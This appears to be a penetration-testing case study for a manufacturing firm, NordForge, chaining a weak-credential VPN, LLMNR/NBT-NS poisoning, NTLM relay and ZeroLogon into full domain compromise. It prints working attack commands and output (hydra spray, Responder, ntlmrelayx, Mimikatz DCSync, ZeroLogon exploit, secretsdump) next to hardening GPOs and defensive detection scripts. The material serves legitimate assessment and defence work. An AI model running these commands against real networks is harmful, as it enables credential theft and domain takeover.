Network Vulnerability Assessment & Pentesting
Securing a hybrid OT/IT manufacturing enterprise against external VPN compromise, LLMNR/NBT-NS poisoning, and full Active Directory domain takeover
Project Details
- Client: NordForge is a mid-sized industrial manufacturing enterprise operating a hybrid infrastructure that bridges legacy Operational Technology (OT) networks driving factory-floor PLCs with a modern, Active Directory-backed corporate IT environment across three production sites
- Industry: Industrial Manufacturing / OT
- Company Size: 600 - 750
- Headquarters: Gothenburg, Sweden
- Project Duration: 1 month (Mar 2026 - Apr 2026)
A comprehensive internal and external network penetration test of a hybrid OT/IT manufacturing enterprise (NordForge Industries) following a merger. The engagement chained a forgotten external VPN endpoint with weak credentials into LLMNR/NBT-NS poisoning, NTLM relay, and an unpatched domain controller (ZeroLogon / Kerberoasting) to prove full Active Directory domain compromise — then delivered network segmentation, SMB signing enforcement, and legacy protocol teardown to prevent ransomware-scale impact.
Engagement Classification · TLP:RED
Project NordRecon / Hybrid OT-IT Assessment
Full-scope internal and external network penetration test of a post-merger manufacturing enterprise. 7 weeks, deep Active Directory analysis, OT/IT boundary review, and a proven domain-compromise attack chain remediated to ransomware-grade resilience.
The Post-Merger Network Blind Spot
When two enterprises merge, they don’t just combine balance sheets — they fuse two distinct trust boundaries, two sets of legacy assets, and two histories of “temporary” exceptions that quietly became permanent. NordForge Industries inherited an entire acquired network whose firewall rules, forgotten edge appliances, and Active Directory trust relationships were undocumented and unaudited.
In an OT-heavy manufacturing environment, the stakes are categorically different from a typical corporate breach: a single pivot from the IT domain into the production OT segment can halt physical manufacturing lines, corrupt PLC logic, and convert a data-confidentiality problem into a safety and availability crisis. Over our 7-week engagement, we proved that the newly bridged network contained a clean, repeatable path from the public internet all the way to Domain Admin — and from there, directly toward the factory floor.
Technical Audit Snapshot
6-Phase Network Assessment Methodology
To stress-test NordForge’s merged perimeter and internal trust model, we structured the engagement around a rigorous, six-phase methodology spanning external reconnaissance through internal lateral movement.
OSINT & External Footprinting
Mapped internet-facing assets, ASN ranges, and DNS records. Enumerated forgotten subdomains and a legacy VPN concentrator inherited from the acquired entity via passive certificate transparency logs.
Scanning & Service Enumeration
Performed full-range TCP/UDP discovery with Nmap, fingerprinting service versions, SMB dialects, and exposed management interfaces across both the external perimeter and internal VLANs.
Vulnerability Analysis
Correlated discovered versions against known CVEs, audited firewall rulesets for overly permissive any-any rules, and identified legacy broadcast protocols (LLMNR/NBT-NS) active on the corporate segment.
Exploitation & Initial Access
Compromised the forgotten external VPN endpoint via weak, reused credentials to establish an internal foothold without triggering perimeter alerting.
Privilege Escalation & Credential Theft
Captured NetNTLMv2 hashes via LLMNR/NBT-NS poisoning (Responder), relayed them to unsigned SMB hosts, and exploited an unpatched domain controller (ZeroLogon) to seize Domain Admin.
Lateral Movement & Remediation Verification
Demonstrated reach toward the OT segment boundary, then co-authored segmentation policy, SMB signing enforcement, and legacy protocol teardown — re-testing each control to confirm closure.
Target Network Topology Under Test
NordForge operates a three-tier network: an internet-facing DMZ, a flat corporate VLAN backed by Active Directory, and a nominally isolated OT zone driving production PLCs. The merger introduced a second, unmanaged VPN concentrator that bridged directly into the corporate segment.
[Topology diagram, recovered from the page's graph: Perimeter Firewall (permissive ruleset) -> inherited tunnel -> Legacy VPN Concentrator (weak credentials) -> flat access -> Domain Controller (unpatched AD DS); Firewall -> allowed -> Corporate Workstation VLAN (LLMNR/NBT-NS enabled) -> relay -> Domain Controller -> over-permissive -> OT DMZ Gateway (weak segmentation) -> Production PLC Controllers]
Vulnerability Classification Matrix
Each identified vulnerability was triaged using the standardized CVSS v3.1 framework and mapped to its corresponding attack technique and remediation status.
External Perimeter vs Internal Network Findings
The engagement split cleanly into two attack surfaces. The external perimeter handed us our initial foothold; the internal network handed us the entire domain.
External perimeter
- An inherited SSL-VPN concentrator (vpn-legacy.nordforge.example) ran firmware two major versions behind and accepted the reused credential svc_backup : Summer2023! — granting a direct tunnel into the flat corporate VLAN.
- The perimeter firewall exposed its HTTPS administration interface to 0.0.0.0/0 on a non-standard port, discoverable via service fingerprinting and vulnerable to credential stuffing.
Internal network
- LLMNR and NBT-NS were enabled domain-wide. Using Responder, we poisoned name resolution to harvest NetNTLMv2 hashes from misconfigured workstation lookups within minutes of gaining internal access.
- SMB signing was not enforced, enabling NTLM relay to high-value hosts. A domain controller missing the August 2020 patch was directly exploitable via ZeroLogon (CVE-2020-1472).
Critical Finding OC-NET-002 — Forgotten External VPN Foothold
External reconnaissance against the merged ASN surfaced a VPN concentrator that appeared in no asset inventory. Certificate transparency logs and reverse-DNS revealed it belonged to the acquired company. The appliance ran outdated firmware and — critically — authenticated against a local account database containing a stale, weak service credential.
Attack Path Sequence
Reconnaissance Proof-of-Concept
# External service discovery against the merged ASN range
nmap -sS -sV -p- --min-rate 2000 -oA nordforge_ext 203.0.113.0/24
# Excerpt — the forgotten VPN concentrator
Nmap scan report for vpn-legacy.nordforge.example (203.0.113.47)
PORT STATE SERVICE VERSION
443/tcp open ssl/https Legacy-VPN Portal 9.1.2 (EOL firmware)
500/tcp open isakmp IKE
4500/tcp open nat-t-ike
# Low-and-slow password spray against the SSL-VPN portal login form
hydra -L users.txt -p 'Summer2023!' -t 2 -W 30 \
vpn-legacy.nordforge.example https-post-form \
"/remote/login:username=^USER^&credential=^PASS^:F=Authentication failed"
[443][http-post-form] host: vpn-legacy.nordforge.example login: svc_backup password: Summer2023!
The concentrator bridged directly into a flat /16 corporate VLAN with no internal segmentation, placing every domain-joined host — including the domain controllers — one hop away from an internet-sourced attacker.
The Remediation Block (Before vs After)
Below is the dynamic comparison demonstrating the inherited, permissive edge configuration and our hardened, zero-trust VPN posture.
# Legacy SSL-VPN — local auth, no MFA
auth-source local
mfa disabled
firmware 9.1.2 # 2 majors behind, EOL
# Tunnel lands directly on flat corporate /16
split-tunnel disabled
assigned-subnet 10.20.0.0/16
acl permit ip any any # no segmentation

# Hardened VPN — federated identity + MFA
auth-source saml-idp # central SSO
mfa required # TOTP / FIDO2
firmware 10.3.1 # current LTS
# Tunnel lands in a constrained jump segment only
split-tunnel enforced
assigned-subnet 10.99.250.0/24 # VPN landing VLAN
acl permit tcp 10.99.250.0/24 to jump-host 22,3389
acl deny ip 10.99.250.0/24 to 10.20.0.0/16
# Decommissioned legacy concentrator entirely

Critical Finding OC-NET-003 — LLMNR/NBT-NS Poisoning to NTLM Relay
With an internal foothold established, the flat network and legacy name-resolution protocols made credential capture trivial. Windows hosts fall back to LLMNR and NBT-NS broadcasts when DNS resolution fails — a routine occurrence with typos and stale shares. By answering these broadcasts, we coerced hosts into authenticating to us and captured their NetNTLMv2 material.
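The same broadcast traffic seen from the defender's side, as an added example that is not part of the original report or its tooling: a responder that answers for names it does not own, or for a decoy name that nobody registered, is a poisoner. The log format, the canary name and the sample lines below are constructed for this example; a sensor or packet-capture export would be normalised into that format.

```python
"""Detect LLMNR/NBT-NS poisoning from a log of observed name-resolution answers.

Input format is constructed for this example, one answer per line:
    <timestamp> <LLMNR|NBTNS> <querying-host> <queried-name> <responder-ip>
Two signals are used:
  1. one responder answering for several *different* names in a short window
     (a legitimate host only ever answers for its own name);
  2. any answer at all for a canary name that no real host carries, which a
     defender can query periodically from a monitoring host.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed decoy name: deliberately never registered, so only a poisoner answers it.
CANARY_NAMES = {"nordforge-canary-fs01"}

# Constructed sample: 10.20.14.200 answers everything; .31 and .60 answer only for themselves.
SAMPLE_LOG = """\
2026-03-18T09:14:02Z LLMNR 10.20.14.31 fileshare01 10.20.14.200
2026-03-18T09:14:05Z NBTNS 10.20.14.52 PRNTSRV 10.20.14.200
2026-03-18T09:14:09Z LLMNR 10.20.14.31 wpad 10.20.14.200
2026-03-18T09:14:11Z LLMNR 10.20.15.77 fileshre01 10.20.14.200
2026-03-18T09:14:20Z LLMNR 10.20.14.90 nordforge-canary-fs01 10.20.14.200
2026-03-18T10:02:30Z LLMNR 10.20.14.52 laptop-jerik 10.20.14.31
2026-03-18T10:05:12Z NBTNS 10.20.14.31 DESK-OPS-3 10.20.14.60
"""


def parse_log(text):
    """Return a list of (timestamp, proto, querier, name, responder) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, proto, querier, name, responder = line.split()
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                       proto, querier, name.lower(), responder))
    return events


def detect_poisoning(events, window=timedelta(minutes=5), min_distinct_names=3):
    """Return {responder_ip: [reason, ...]} for responders that behave like a poisoner."""
    alerts = defaultdict(list)
    answers_by_responder = defaultdict(list)
    for ts, proto, querier, name, responder in sorted(events):
        if name in CANARY_NAMES:
            alerts[responder].append(
                f"answered canary name {name!r} over {proto} for querier {querier}")
        answers_by_responder[responder].append((ts, name))

    for responder, answers in answers_by_responder.items():
        # Sliding window: how many distinct names did this responder claim within `window`?
        for i, (start, _) in enumerate(answers):
            claimed = {n for ts, n in answers[i:] if ts - start <= window}
            if len(claimed) >= min_distinct_names:
                alerts[responder].append(
                    f"claimed {len(claimed)} distinct names within "
                    f"{int(window.total_seconds())}s from {start:%H:%M:%S}")
                break
    return dict(alerts)


if __name__ == "__main__":
    for ip, reasons in detect_poisoning(parse_log(SAMPLE_LOG)).items():
        print(ip, "->", "; ".join(reasons))
```

The window signal catches a poisoner even without a canary, because every poisoned lookup (the typo `fileshre01`, the `wpad` probe) is answered by the same address; the canary signal fires on a single packet and is the cheaper thing to alert on continuously.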
Attack Vector Diagram
[Decision flow, recovered from the page's diagram: LLMNR/NBT-NS broadcast enabled? -> Yes: attacker answers as the host -> NetNTLMv2 hash captured -> SMB signing enforced? -> No: relay to a target where that user is admin (SYSTEM); Yes: relay rejected. Broadcast disabled -> resolution fails safely.]
Exploitation Mechanics
# 1. Poison LLMNR/NBT-NS and capture hashes
responder -I eth0 -wv
[+] Listening for events...
[SMB] NTLMv2-SSP Hash : NORDFORGE\j.eriksson::NORDFORGE:1122...
[SMB] NTLMv2-SSP Hash : NORDFORGE\svc_sql::NORDFORGE:88af...
# 2. With SMB signing OFF on targets, relay instead of crack
ntlmrelayx.py -tf unsigned_hosts.txt -smb2support -c "whoami"
[*] Authenticating against smb://10.20.14.31 as NORDFORGE\j.eriksson SUCCEED
[*] Executed specified command on host: 10.20.14.31
nt authority\system
Hosts whose users held local-admin rights elsewhere allowed us to relay straight to SYSTEM, dump local credentials with Mimikatz, and pivot — building the credential pile that ultimately reached a Domain Admin session.
# Mimikatz — harvesting cached secrets post-relay
mimikatz # sekurlsa::logonpasswords
Username : svc_sql
Domain : NORDFORGE
NTLM : 9f3a...c21d
mimikatz # lsadump::dcsync /user:NORDFORGE\krbtgt
[DC] 'nordforge.local' will be the domain
Object RID : 502
Credentials NTLM : 5e1f...a09b
Hardened Domain Configuration
# Disable legacy name resolution domain-wide via GPO
# Computer Config > Admin Templates > Network > DNS Client > "Turn off multicast name resolution"
# (the GPO named below must already exist and be linked to the target OUs)
Set-GPRegistryValue -Name "Harden-NameResolution" `
    -Key "HKLM\Software\Policies\Microsoft\Windows NT\DNSClient" `
    -ValueName "EnableMulticast" -Type DWord -Value 0
# Disable NBT-NS on all interfaces (deployment script, run on each host)
$nic = Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "IPEnabled=true"
$nic | ForEach-Object { $_.SetTcpipNetbios(2) } # 2 = disable NetBIOS over TCP/IP
# Enforce SMB signing to defeat NTLM relay entirely
# (LanManServer = the inbound/server side, which is what rejects a relayed session to this host)
Set-GPRegistryValue -Name "Enforce-SMB-Signing" `
    -Key "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" `
    -ValueName "RequireSecuritySignature" -Type DWord -Value 1
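A closure check for the SMB-signing control, added here as an example and not part of the original report: it parses the output of nmap's smb2-security-mode script and lists every host that still accepts unsigned sessions, which is exactly the set the relay finding depended on. The scan text below is constructed and modelled on nmap's normal output format.

```python
"""Verify SMB-signing closure from nmap's smb2-security-mode script output.

The scan text below is constructed for this example and modelled on nmap's
normal output; a real run would be something like
    nmap -p445 --script smb2-security-mode -oN smb_signing.txt <corporate ranges>
"Message signing enabled but not required" is the state that makes a host a
valid NTLM-relay target; after the GPO above applies, no host should report it.
"""
import re

SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.20.14.31
Host is up (0.0012s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required

Nmap scan report for dc01.nordforge.local (10.20.0.10)
Host is up (0.00090s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required

Nmap scan report for 10.20.14.52
Host is up (0.0030s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
"""

# Matches "Nmap scan report for 10.1.2.3" and "Nmap scan report for name (10.1.2.3)"
HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?(\d+\.\d+\.\d+\.\d+)\)?\s*$")
SIGNING_RE = re.compile(r"Message signing (.+?)\s*$")


def parse_signing_posture(scan_text):
    """Map each scanned host IP to True if signing is required, False if not."""
    posture, current_host = {}, None
    for line in scan_text.splitlines():
        host = HOST_RE.match(line)
        if host:
            current_host = host.group(1)
            continue
        sig = SIGNING_RE.search(line)
        if sig and current_host:
            # "enabled but not required" and "disabled ..." both leave the host relayable
            posture[current_host] = "not required" not in sig.group(1)
    return posture


def remediation_gaps(scan_text):
    """Hosts that still accept unsigned SMB sessions, i.e. are still relay targets."""
    return sorted(ip for ip, required in parse_signing_posture(scan_text).items() if not required)


def closure_confirmed(scan_text):
    """True only when the scan saw at least one host and every host requires signing."""
    posture = parse_signing_posture(scan_text)
    return bool(posture) and all(posture.values())


if __name__ == "__main__":
    print("still relayable:", remediation_gaps(SAMPLE_NMAP_OUTPUT))
    print("closure confirmed:", closure_confirmed(SAMPLE_NMAP_OUTPUT))
```

Run it against a post-change scan of the same ranges that were assessed; a non-empty gap list means the GPO has not reached those hosts (unlinked OU, stale policy, or a host that is not domain-joined) and the relay path is still open there.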
Critical Finding OC-NET-001 — ZeroLogon Domain Takeover
The acquired environment’s primary domain controller was missing the August 2020 security rollup, leaving it exposed to CVE-2020-1472 (ZeroLogon) — a cryptographic flaw in the Netlogon protocol that lets an unauthenticated attacker set the DC’s machine account password to empty, then impersonate it.
Domain Compromise Vector
Exploitation Proof-of-Concept
# Confirm vulnerability (non-destructive check)
python3 zerologon_tester.py DC01 10.20.0.10
Success! DC01 is vulnerable to ZeroLogon (CVE-2020-1472)
# Exploit + immediate DCSync to extract domain secrets
python3 cve-2020-1472-exploit.py DC01 10.20.0.10
secretsdump.py -just-dc -no-pass 'NORDFORGE/DC01$@10.20.0.10'
Administrator:500:aad3b...:c0ffee...:::
krbtgt:502:aad3b...:5e1f...a09b:::
From here we held the keys to the entire kingdom — including the ability to forge Golden Tickets and reach the OT DMZ gateway, which an over-permissive firewall rule (OC-NET-005) allowed Domain Admin hosts to contact directly. We stopped at the OT boundary by prior rules of engagement, having conclusively demonstrated reachability to production-critical systems.
Critical remediation note: ZeroLogon exploitation can leave the DC’s secure channel broken. Our exploitation restored the original machine-account password immediately afterward, and we coordinated patch deployment as the very first remediation action.
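Event-log triage for the traces this flaw leaves on a domain controller, added here as an example and not taken from the original report. The event IDs are Microsoft's; the records, the set of DC machine accounts and the flattened field names are constructed for the example.

```python
"""Triage domain-controller event records for ZeroLogon (CVE-2020-1472) indicators.

Records are constructed for this example; keys follow the event's XML EventData
fields the way a SIEM forwarder typically flattens them. Signals used:
  * Security 4742 ("A computer account was changed") on a DC machine account where
    the subject is ANONYMOUS LOGON (SID S-1-5-7). The exploit resets the DC's
    password over an unauthenticated Netlogon session, so no real principal made
    the change; routine rotations are performed by the machine's own account.
  * System 5827/5828/5829 from NETLOGON on a patched DC (Microsoft's post-patch
    telemetry): 5829 = a vulnerable secure-channel connection was still allowed,
    5827/5828 = one was denied once enforcement mode is on.
"""
# Constructed: machine accounts of the domain's controllers.
DC_ACCOUNTS = {"DC01$", "DC02$"}

SAMPLE_EVENTS = [
    # suspicious: DC01's own password reset by an anonymous subject
    {"EventID": 4742, "Channel": "Security", "Computer": "DC01.nordforge.local",
     "SubjectUserName": "ANONYMOUS LOGON", "SubjectUserSid": "S-1-5-7",
     "TargetUserName": "DC01$", "PasswordLastSet": "2026-03-19 11:42:07"},
    # benign: a workstation rotating its own machine password
    {"EventID": 4742, "Channel": "Security", "Computer": "DC01.nordforge.local",
     "SubjectUserName": "WS-ENG-14$", "SubjectUserSid": "S-1-5-21-1000000000-2000000000-3000000000-1107",
     "TargetUserName": "WS-ENG-14$", "PasswordLastSet": "2026-03-19 08:00:00"},
    # post-patch telemetry: a legacy device still negotiating vulnerable Netlogon
    {"EventID": 5829, "Channel": "System", "Computer": "DC02.nordforge.local",
     "Provider": "NETLOGON", "SamAccountName": "HMI-LINE2$", "IpAddress": "10.50.0.22"},
    # unrelated noise
    {"EventID": 4624, "Channel": "Security", "Computer": "DC01.nordforge.local",
     "TargetUserName": "j.eriksson", "LogonType": 3, "IpAddress": "10.20.14.31"},
]


def is_anonymous(event):
    return (event.get("SubjectUserSid") == "S-1-5-7"
            or event.get("SubjectUserName", "").upper() == "ANONYMOUS LOGON")


def classify(event):
    """Return (severity, message) for a ZeroLogon-relevant event, else None."""
    eid = event.get("EventID")
    if eid == 4742 and event.get("TargetUserName") in DC_ACCOUNTS and is_anonymous(event):
        return ("CRITICAL",
                f"{event['TargetUserName']} password changed by ANONYMOUS LOGON on "
                f"{event['Computer']} at {event.get('PasswordLastSet')}: treat as ZeroLogon, "
                "verify the DC's patch level and recover its secure channel")
    if eid in (5827, 5828):
        return ("HIGH",
                f"Netlogon denied a vulnerable secure channel from "
                f"{event.get('SamAccountName')} ({event.get('IpAddress')}) on {event['Computer']}")
    if eid == 5829:
        return ("MEDIUM",
                f"Netlogon still allowed a vulnerable secure channel from "
                f"{event.get('SamAccountName')} ({event.get('IpAddress')}); "
                "fix or isolate that device before turning on enforcement mode")
    return None


def triage(events):
    """Keep only the events that matter, highest severity first."""
    order = {"CRITICAL": 0, "HIGH": 1, "MEDIUM": 2}
    hits = [c for c in map(classify, events) if c]
    return sorted(hits, key=lambda c: order[c[0]])


if __name__ == "__main__":
    for severity, message in triage(SAMPLE_EVENTS):
        print(f"[{severity}] {message}")
```

The 5829 entries matter in an OT estate specifically: they are how you find the HMIs and engineering stations that still speak vulnerable Netlogon before enforcement mode would cut them off the domain.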
Active Directory Pivot Explorer
The full kill chain, stage by stage: the tooling, technique, and outcome at each hop, from the internet-facing edge all the way to the OT boundary.
hydra -L users.txt -p 'Summer2023!' -t 2 \
vpn-legacy.nordforge.example https-post-form \
"/remote/login:username=^USER^&credential=^PASS^:F=failed"
Low-and-slow spray of an inherited, EOL SSL-VPN portal. A reused service credential grants a tunnel straight onto the flat /16 corporate VLAN — no MFA, no perimeter alert.

responder -I eth0 -wv
[SMB] NTLMv2-SSP Hash : NORDFORGE\j.eriksson::NORDFORGE:1122...
ntlmrelayx.py -tf unsigned_hosts.txt -smb2support -c "whoami"
Poison broadcast name resolution to capture NetNTLMv2 material, then relay to hosts with SMB signing disabled — landing a SYSTEM shell without ever cracking a hash.

python3 zerologon_tester.py DC01 10.20.0.10
Success! DC01 is vulnerable (CVE-2020-1472)
secretsdump.py -just-dc -no-pass 'NORDFORGE/DC01$@10.20.0.10'
An unpatched DC lets us zero out its machine-account password, then DCSync the entire directory — including krbtgt. Full domain compromise from a single flaw.

# Domain Admin host permitted to reach OT DMZ gateway
nmap -Pn -p 502,44818 10.50.0.0/24 # Modbus / EtherNet-IP
# >>> ENGAGEMENT STOP — OT boundary reached per rules of engagement
An over-permissive firewall rule exposed the OT DMZ gateway to Domain Admin hosts. Reachability to production PLC protocols was confirmed, then halted by prior agreement.
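A defender-side check for the class of rule behind OC-NET-005, added here as an example and not part of the original report: it parses a ruleset written in the acl style of the VPN comparison above and reports any-any permits and whether an ordinary corporate workstation can reach the OT range on the PLC protocols named at this hop. The rule grammar, the sample rulesets and the engineering jump subnet are assumptions made for the example.

```python
"""Audit a firewall ruleset for any-any permits and corporate-to-OT reachability.

Rule grammar is constructed for this example (a real export would be translated into it):
    acl <permit|deny> <ip|tcp|udp> <src-cidr|any> [to] <dst-cidr|any> [port[,port...]]
Rules are evaluated first-match-wins with an implicit final deny.
"""
import ipaddress
from dataclasses import dataclass
from typing import Optional

CORP_VLAN = ipaddress.ip_network("10.20.0.0/16")   # flat corporate VLAN from the report
OT_ZONE = ipaddress.ip_network("10.50.0.0/24")     # OT DMZ range the report scanned
OT_PORTS = {502: "Modbus/TCP", 44818: "EtherNet/IP"}


@dataclass(frozen=True)
class Rule:
    action: str                            # "permit" or "deny"
    proto: str                             # "ip" (any protocol), "tcp" or "udp"
    src: Optional[ipaddress.IPv4Network]   # None means any
    dst: Optional[ipaddress.IPv4Network]
    ports: Optional[frozenset]             # None means any port
    text: str

    def matches(self, src_ip, dst_ip, proto, port):
        return ((self.proto == "ip" or self.proto == proto)
                and (self.src is None or src_ip in self.src)
                and (self.dst is None or dst_ip in self.dst)
                and (self.ports is None or port in self.ports))


def _net(token):
    return None if token == "any" else ipaddress.ip_network(token, strict=False)


def parse_ruleset(text):
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop trailing comments
        if not line:
            continue
        tok = line.split()
        if len(tok) < 5 or tok[0] != "acl" or tok[1] not in ("permit", "deny"):
            raise ValueError(f"unparseable rule: {raw!r}")
        src, rest = tok[3], tok[4:]
        if rest and rest[0] == "to":                 # the keyword is optional
            rest = rest[1:]
        if not rest:
            raise ValueError(f"missing destination: {raw!r}")
        ports = frozenset(int(p) for p in rest[1].split(",")) if len(rest) > 1 else None
        rules.append(Rule(tok[1], tok[2], _net(src), _net(rest[0]), ports, line))
    return rules


def evaluate(rules, src_ip, dst_ip, proto, port):
    """Action applied to one flow: first matching rule wins, default deny."""
    src_ip, dst_ip = ipaddress.ip_address(src_ip), ipaddress.ip_address(dst_ip)
    for rule in rules:
        if rule.matches(src_ip, dst_ip, proto, port):
            return rule.action
    return "deny"


def audit(text, corp_host="10.20.14.31", ot_host="10.50.0.10"):
    """Findings: structural over-permits plus ordinary-corp-host -> OT reachability."""
    rules = parse_ruleset(text)
    findings = []
    for r in rules:
        if r.action != "permit":
            continue
        if r.src is None and r.dst is None and r.ports is None:
            findings.append(f"any-any permit: {r.text!r}")
        elif (r.src is None or CORP_VLAN.subnet_of(r.src)) and (r.dst is None or r.dst.overlaps(OT_ZONE)):
            findings.append(f"whole corporate VLAN permitted toward OT: {r.text!r}")
    for port, name in OT_PORTS.items():
        if evaluate(rules, corp_host, ot_host, "tcp", port) == "permit":
            findings.append(f"corporate host {corp_host} can reach OT host {ot_host} on {name} ({port})")
    return findings


# Constructed samples: the inherited flat ruleset and a segmented replacement.
LEGACY_RULESET = """
acl permit ip any any                                   # no segmentation
"""
HARDENED_RULESET = """
acl permit tcp 10.20.250.0/24 to 10.50.0.0/24 502,44818  # engineering jump subnet only
acl deny   ip  10.20.0.0/16   to 10.50.0.0/24            # rest of corp stays out of OT
acl permit tcp 10.20.0.0/16   to 10.20.0.0/16            # intra-corp traffic
"""

if __name__ == "__main__":
    for label, ruleset in (("legacy", LEGACY_RULESET), ("hardened", HARDENED_RULESET)):
        print(label, "->", audit(ruleset) or ["no findings"])
```

The reachability check is the useful half: it evaluates concrete flows through the rule order, so a permit that is later shadowed by a deny does not count, and a narrow engineering subnet can keep its PLC access while a generic workstation is refused.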
Network Attack Surface Risk Score · Before vs After
A quantifiable representation of systemic risk reduction, calculated across external exposure, internal segmentation depth, credential hygiene, and Active Directory patch posture.
Systemic Risk Mitigation Velocity
Composite threat score across 1,284 enumerated hosts and the merged perimeter
Side-by-Side Attack Simulator Replay
A real-time simulation tracking an attempted NTLM relay against NordForge’s legacy flat network and the post-engagement segmented, signing-enforced build.
Quantifiable Business Impact
Our assessment converted an opaque, post-merger network into a measured, defensible posture — and prevented a credible path to full domain compromise and OT-disrupting ransomware deployment.
Strategic Takeaways
Securing a merged, hybrid OT/IT estate demands treating the network itself — not just its applications — as a primary trust boundary.
- Inventory is a security control. The single most dangerous asset was the one nobody knew existed. Post-merger reconciliation of every internet-facing endpoint, VPN, and trust relationship must precede integration, not follow a breach.
- Flat networks turn one foothold into total compromise. Internal segmentation, enforced SMB signing, and disabling legacy broadcast protocols collapse the gap between “initial access” and “domain admin.” Defense-in-depth must assume the perimeter will be breached.
- Patch posture on identity infrastructure is non-negotiable. A single unpatched domain controller (ZeroLogon) reduced a multi-stage attack to one command. Tiered administration and rapid DC patching are the highest-leverage controls in any AD environment — especially where IT compromise can cascade into physical OT impact.
Hear it straight from NordForge Industries
“After acquiring a competitor, we inherited a network we barely understood and could not afford to trust. Antigravity executed a full internal and external assessment that exposed exactly how an attacker could pivot from a forgotten VPN endpoint all the way to domain admin — and into our production OT segment. They proved a complete domain compromise in days, then handed us a concrete segmentation and hardening roadmap. We sleep far better knowing the gaps were closed before anyone malicious found them.”
Markus Lindqvist
CISO at NordForge Industries